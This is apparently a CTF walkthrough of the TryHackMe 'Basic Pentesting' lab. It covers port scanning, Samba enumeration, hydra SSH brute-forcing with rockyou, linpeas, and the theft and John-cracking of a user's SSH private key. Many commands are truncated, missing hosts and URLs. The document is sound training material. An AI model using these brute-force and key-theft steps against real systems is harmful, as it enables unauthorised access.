Basic Pentesting

Task 1. Web App Testing and Privilege Escalation

Question 1. 

Deploy the machine and connect to our network

Start the machine and connect to the  THM network using openvpn or the attack box.

Question 2.

Find the services exposed by the machine 


# nmap -p- -A


22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7

Found 6 ports open.

Question 3. 

What is the name of the hidden directory on the web server(enter name without /)? 

For this we are going to use gobuster with the dirbuster directory-medium wordlist


# gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Scan returned 2 directories 


/development          (Status: 301) [Size: 316] [–>]

/server-status        (Status: 403) [Size: 299]   

Answer 3.


Question 4. 

User brute-forcing to find the username & password

We could use hydra with username/password  lists to try and bruteforce passwords but since we have Samba ports exposed we will enumerate Samba shares, using a tool called enum4linux


Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.


# enum4linux -U -a


Share Enumeration on   

Anonymous       Disk      

IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)

[+] Enumerating users using SID S-1-22-1 and logon username ”, password ”

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

Found 2 usernames and 2 shares. 

Question 5. 

What is the username? 

Answer 5.


Question 6.  

What is the password? 

OK since we have a username and port 22 (SSH) exposed we can  try bruteforcing the password using Hydra in combination with the rockyou wordlist.


Hydra is a parallelized password cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. 


# hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh                                                 


[22][ssh] host:   login: jan   password: armando

1 of 1 target successfully completed, 1 valid password found

Success, Hydra found the password 

Answer 6. armando

Question 7.  What service do you use to access the server(answer in abbreviation in all caps)?

From our initial nmap scan we know that port 22 SSH is open so we will connect to the server using Secure Shell using username jan and password armando.

# ssh jan@

enter the password and we are in. 

Answer 7.


Question 8.

Enumerate the machine to find any vectors for privilege escalation 

Now that we  have access to the server with jan’s account we can automate this process using linpeas script, the script can be found: 


LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on 

So let’s get the script and copy it over to the server using jan’s credentials.

# git clone

Navigate to the directory containing the   (PEASS-ng/linPEAS/

# scp jan@

Once the transfer is complete, run the script. This takes some time so be patient.

Script returned a lot of interesting files but most valuable of all are Kay’s private ssh keys. 

Question 9.

What is the name of the other user you found(all lower case)?

We got that from question 4 (enum4linux).

Answer 9.


Question 10.

If you have found another user, what can you do with this information?

From the linpeas output we can see that Kay’s ssh private key is readable so we will exploit this to ssh-login with Kay and see if we can find the final password. 

The location of the private key is 


Question 11.  

What is the final password you obtain?

OK so, in order to login with Kay’s private key you need to provide a passphrase (which we don’t know) since his key is password protected. Let’s store the key in a file for now. 

$ cat /home/kay/.ssh/id_rsa

File containing the key on my local machine.

# nano /tmp/id_kay

Copy and paste the output  to a file in your local pc.

Since we already have the private key we can try to figure out the password for the key  using JohnTheRipper suite. 


John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. 

Ssh2john is part of John The Reaper suite. This is a script that basically transforms [RSA/DSA/EC/OPENSSH (SSH private keys) ] private key to john format for later cracking using JtR  


# /usr/share/john/ /tmp/id_kay > /tmp/s2j_kay


john /tmp/s2j_kay –wordlist =/usr/share/wordlist/rockyou.txt


Will run 8 OpenMP threads

Note: This format may emit false positives, so it will keep trying even after

finding a possible candidate.

Press ‘q’ or Ctrl-C to abort, almost any other key for status

beeswax          (/tmp/kay_id)

Warning: Only 2 candidates left, minimum 8 needed for performance.

1g 0:00:00:04 DONE (2021-09-07 14:26) 0.2500g/s 3585Kp/s 3585Kc/s 3585KC/sa6_123..*7¡Vamos!

Session completed

Success, john found the password beeswax. Now using this passphrase we can unlock Kay’s private key and log in to the server as kay.


ssh kay@

Enter passphrase.. and we are in. Now let’s have a look at this pass.bak file. 

$ cat pass.bak



Answer 11.